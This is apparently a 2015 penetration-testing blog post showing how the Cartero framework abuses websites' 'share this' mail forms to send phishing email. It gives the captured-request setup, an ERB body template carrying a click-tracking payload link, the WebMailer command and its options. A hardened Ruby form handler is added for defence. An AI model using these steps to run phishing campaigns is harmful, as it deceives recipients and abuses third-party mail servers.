Cartero — Automating Phishing Mail <Forms> requests

Section 9 Labs
Published in Section 9 Lab
Mar 23, 2015

Many websites, willingly or not, allow users to send emails through a simple web request. Knowing this, we can automate phishing campaigns with Cartero by exploiting these vulnerable web forms to send the emails.

While performing WebApp penetration tests, more than one of us have come across those “share this” buttons that generate a mail form allowing users to share data. With some digging around, plenty of them actually give attackers enough variables to send arbitrary emails using the website as the source.

After one engagement where that was useful, I always kept a little script hanging around that would easily allow me to send emails that way. One thing led to another, and the Cartero Framework ended up having a reincarnation of it.

In any case, these requests sometimes do come in handy, because mail servers do not block or even check emails coming from those web servers, since they “should” be trusted and are used internally.

Cartero WebMailer

Let us discuss the process to set up and launch an attack using Cartero’s WebMailer command, using the freely available send-email.com mail service as an example. Note: this is not a vulnerable URL, but it will serve as a good example to show the process.

—[ Step 1: Obtain webmail POST/GET request

Once we have found a vulnerable site, it is time to copy the request, with the help of Chrome DevTools, Burp or any other tool capable of showing us the request, and use it to extract the information we need.

[Figure: Chrome Network view of the POST request]

Note: This could also easily be copied using Burp or any other proxy.

—[ Step 2: Create a webmail server config

In order to generate a server configuration out of the data we just obtained, let us create one using the Server command in Cartero.

❯❯❯ ./cartero Server --add webmail -T webmail

This will create the server configuration file, which we then populate as shown below: make all the necessary changes and add any cookies and special headers the request needs.

—[ Step 3: Generating a body payload

Now it is time to take your email and turn it into a template. For people familiar with ERB, this should be easy.

❯❯❯ cat sample.web
_token=WYEwpMnaU5GRKumTpYiRna6W7XixoMgygH8wXfHu&emailTo=<%= ERB::Util::url_encode self[:email] %>&replyTo=<%= ERB::Util::url_encode self[:reply_to] %>&subject=This+is+a+test+<%= ERB::Util::url_encode self[:name] %>&message=Hola+<%= ERB::Util::url_encode self[:name] %>%2C%0D%0AThis+email+needs+to+be+displayed+as+HTML.+This+is+an+automated+email+to+your+email+<%= ERB::Util::url_encode self[:email] %>.+In+addition%2C+this+email+can+also+be+displayed+securely+on+http://192.168.1.216:8080/click?key=<%= ERB::Util::url_encode self[:payload] %>
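The template above shows what makes such a form abusable: the request itself chooses the recipient, the reply-to address, the subject and the whole message body. The following Ruby snippet is an added example, not Cartero's code nor any real site's handler; it contrasts a “share this” handler that relays every submitted field with a hardened one that only accepts a recipient and a server-side item id (the ALLOWED_ITEMS table, the example.com addresses and the sample POST body are all constructed for illustration).

```ruby
require 'uri'

# Constructed sample: the body a "share this" form posts, with the same field
# names as the captured request in the article (decoded by parse_form below).
SAMPLE_BODY = 'emailTo=victim%40example.com&replyTo=attacker%40example.net' \
              '&subject=Urgent&message=Please+visit+http%3A%2F%2F192.0.2.1%2Flogin'

EMAIL_RE = /\A[\w.+-]+@[\w-]+(\.[\w-]+)+\z/
SITE_FROM = 'noreply@example.com'                       # assumed site address
ALLOWED_ITEMS = { '42' => 'Quarterly report', '7' => 'Release notes' }.freeze

def parse_form(body)
  URI.decode_www_form(body).to_h                        # "a%40b&c=d" -> {"a"=>"b", ...}
end

# Vulnerable handler: every field from the request ends up in the outgoing
# mail, so anyone who can submit the form can send arbitrary messages from
# the site's mail server (this is what the ERB template above fills in).
def vulnerable_share(params)
  { from: SITE_FROM, to: params['emailTo'], reply_to: params['replyTo'],
    subject: params['subject'], body: params['message'] }
end

# Hardened handler: the request may only pick a valid recipient and a known
# item; from, reply-to, subject and body are fixed server-side. Returns nil
# when the request is rejected, and reports unexpected fields so the
# application can log probing attempts against the form.
def hardened_share(params)
  to = params['emailTo'].to_s
  item_id = params['itemId'].to_s
  item = ALLOWED_ITEMS[item_id]
  return nil unless to.match?(EMAIL_RE) && item

  probed = params.keys - %w[emailTo itemId]             # e.g. ["replyTo", "message"]
  { from: SITE_FROM, to: to, reply_to: SITE_FROM,
    subject: "A page was shared with you: #{item}",
    body: "Someone shared \"#{item}\" with you: https://example.com/items/#{item_id}",
    probed_fields: probed }
end
```

Wiring this into a real application also calls for rate limiting per source address, since a hardened form can still be used to flood a recipient with legitimate-looking share notices.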

—[ Step 4: Launch the Attack

Running the command without arguments prints a useful help message:

❯❯❯ ./cartero WebMailer
Usage: Cartero WebMailer [options]
-R, --raw [RAW_REQUEST_FILE] Sets WebMail Raw Request
-S, --server [SERVER_NAME] Sets WebMail server to use
-U, --url [URL:PORT] Sets WebMail server url to use
-H [HEADER:VAL\nHEADER:VAL], Sets WebMail Headers to use
--headers
-C, --cookies [COOKIES] Sets WebMail Cookies to use
-D, --data [DATA_FILE] File containing template data sets
-s, --subject [EMAIL_SUBJECT] Sets Email subject
-f, --from [EMAIL_FROM] Sets Email from
-r, --reply-to [EMAIL_REPLY_TO] Sets Email reply-to
-b, --body [REQUEST_FILE_PATH] Sets Email Text request query Body
-p [PORT_1,PORT_2,..,PORT_N], Sets Email Payload Ports to scan
--ports
Common options:
-h, --help Show this message
--list-options Show list of available options

Now, using our usual sample.json datasets, we launch the attack as follows:

❯❯❯ ./cartero WebMailer -D accounts.json -b sample.web -S webmail
  • -D: the dataset containing the people you want to send the email to, plus any other data you want to auto-populate in your email templates.
  • -b: the template body you want to use, that is, the actual POST or GET query string you will be sending to the server to create the emails, as shown above.
  • -S: the server template containing the server configuration.

—[ Step 5: Pwning

Sit back, relax and enjoy your … 😃
